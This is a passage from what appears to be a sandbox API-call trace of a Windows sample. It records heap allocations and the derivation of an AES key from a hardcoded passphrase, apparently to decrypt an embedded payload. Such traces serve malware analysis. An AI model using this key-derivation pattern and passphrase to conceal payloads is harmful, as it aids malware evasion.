0x43cab98 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.437] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0129.438] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab68 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0129.438] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.438] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.439] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0129.440] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.440] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0129.441] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0129.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0129.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796f28, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0129.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x15) returned 0x1796e88 [0129.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796e88, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0129.442] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0129.442] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0129.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0129.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0129.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0129.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0129.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0129.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.443] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb018 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0129.444] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e99c8 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0129.445] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923e8 [0129.445] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2780 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae38 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0129.445] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0129.446] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0129.446] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae08 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0129.446] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e97a0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0129.446] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.446] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0129.447] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392148 [0129.447] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2860 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0129.447] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0129.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0129.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0129.448] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0129.448] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0129.448] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0129.448] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0129.448] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.448] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0129.448] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0129.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caee0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0129.448] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0129.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0129.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0129.449] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0129.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0129.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0129.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.449] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0129.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caf88, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0129.449] CryptHashData (hHash=0x41ac140, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0129.449] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.449] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0129.450] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0129.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cb060, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0129.450] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac6c0) returned 1 [0129.450] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0129.450] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0129.450] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0129.450] WideCharToMultiByte (in: 